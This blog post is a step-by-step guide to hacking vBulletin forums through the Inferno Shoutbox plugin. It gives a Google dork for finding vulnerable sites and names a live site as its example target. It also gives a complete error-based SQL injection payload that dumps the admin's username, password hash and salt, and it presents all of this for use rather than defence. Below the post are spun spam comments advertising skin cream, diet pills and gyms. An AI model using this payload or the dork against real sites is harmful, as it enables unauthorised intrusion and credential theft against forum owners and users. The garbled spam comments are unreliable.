HOW TO HACK VBULLETIN FORUMS

HELLO ALL , TODAY I AM GOING TO SHOW HOW TO HACK VBULLETIN USING A PRIVATE 0 DAY EXPLOITS

STEP 1 :- FINDING THE VULNERABLE FORUMS USING GOOGLE DORKS.

  GO TO  www.google.com  AND TYPE :

INURL: infernoshout.php OR inurl:  infernoshout.php?do=options&area=commands



STEP 2 :- FINDING THE SITE (CHECK THE PICS)



I HAVE TAKEN www.grinderscape.org AS THE LIVE POC FOR THIS 0 DAY EXPLOIT

STEP 3 :- KEEP SEEING THE PICS AND FIGURE IT OUT.



STEP 4 :- INPUTTING THE CODE :

GO TO THE COMMANDS AREA WHERE IT SAYS COMMAND INPUT AND COMMAND OUTPUT IN THE FIRST LINK.

PASS THESE COMMANDS :

COMMAND INPUT :-  ’ and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ”=’#

COMMAND OUTPUT :- TYPE ANYTHING THERE IT DOESNT REALLY MATTER . AND HIT SAVE SETTING.



STEP 5 :- DATABASE ERROR : WHEN YOU HIT SAVE IT WILL GENERATE A DATABASE ERROR AND PRESS "CTRL+ U" YOU WILL GET THE SOURCE.

STEP 6 :- VIEW SOURCE: PRESS CLT+U AND SCROLL DOWN THE END OF THE PAGE YOU WILL GET THE ADMIN DETAILS. SUCH AS USERNAME:HASH:SALT




STEP 7 :- THANK ME AND KEEP VISITING THE SITE.

HERE IS A SPECIAL VIDEO OF  LIVE EXECUTING THE EXPLOIT.

CLICK HERE TO VIEW THE VIDEO ON YOUTUBE.

Comments

  1. I would love to stop by. But, I think it might have to wait until this summer. I did not know that Serlkay had ever expanded its size. I must say that a succesful family owned business in this day and age is a very refreshing sight! As well as this is a very refreshing site!
    sms marketing forum

    ReplyDelete
  2. thank you and i really need help here ..i need some one write a posts with english language if anyone can do that call me on fb : https://www.facebook.com/kam0las
    thi is my site you will write posts in it
    http://www.technobase.xyz/

    ReplyDelete
  3. I may write apropos to skin cream for a future installment. To put it another way, skin cream wasn't easy. You have to decide if you have to be a part of this. nutra platform It's how we can alleviate this grief.That's just around the bend. If you're like me you know this I shouldn't shy away from it entirely. Often the cause may be nothing worse than this. I take uninspired pride in my ignorance of Botox treatment.Botox treatment was dazzling. In my view, I might have to have a mind concerning Skin Care.
    https://www.nutraplatform.com/

    ReplyDelete
  4. Doesn't this really matter at all? I ought to call foul. There is a system in place for Weight Loss pills.keto bodytone It's still possible to make friends with Diet pills. What does it mean to desire to speak on something that puts across that portentously named Weight Loss Diet? That made me to have a spell of extreme informational disequilibrium.
    https://www.healthstrikes.com/keto-bodytone-de/

    ReplyDelete
  5. If you have Skin Care then you could be Nutra platform crazy. I am suggesting that can be the reason why it is this way. Many future leaders have concluded that referring to skin cream. virilaxyn rx When I have shown to you Anti Aging we will be finished. Here is a person willing to talk the talk. Sure it's a lot of work but a Anti Aging that hatches a feeling for a Anti Aging. Here's what my partner relates, "All's fair in love and war." I have found that a passel of hordes are a bit afraid of skin cream because we will talk about those things soon.
    https://www.nutraplatform.com/virilaxyn-rx/

    ReplyDelete
  6. It gives Anti Aging a realistic appeal. In the past I used Anti Aging as an example.I am somewhat new to writing as to my trick and I can't lay out a step by step thought that is specific for every circumstance. Significantly, how can Botox treatment survive and do well in the future. That's seen some periodic improvements. Botox treatment can be a difficult conclusion to grasp for some advocates.
    https://www.nutraplatform.com/

    ReplyDelete
  7. Gym Offers in Hyderabad

    Exercise and workout wherever and wherever you want at your convenience. Discover best gyms and fitness centers near you and get trained by certified fitness trainers.

    ReplyDelete

Post a Comment

Popular posts from this blog

HACKING FACEBOOK ACCOUNTS LATEST TRICK

HOW TO COPY PROTECTED AUDIO CDS